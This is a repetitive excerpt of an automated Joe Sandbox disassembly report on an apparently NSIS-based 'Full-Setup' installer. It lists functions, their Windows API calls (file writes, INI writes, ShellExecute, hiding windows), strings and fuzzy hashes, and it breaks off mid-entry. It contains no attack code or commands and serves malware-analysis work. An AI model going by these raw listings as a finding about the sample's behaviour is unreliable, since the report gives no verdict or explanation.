Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$ExteriorGeographyWaterUniversities$Pop: stack empty
API String ID: 1459762280-2794156658
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(006887D8), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

ExteriorGeographyWaterUniversities, xrefs: 00402770
<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$ExteriorGeographyWaterUniversities$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-2760581209
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
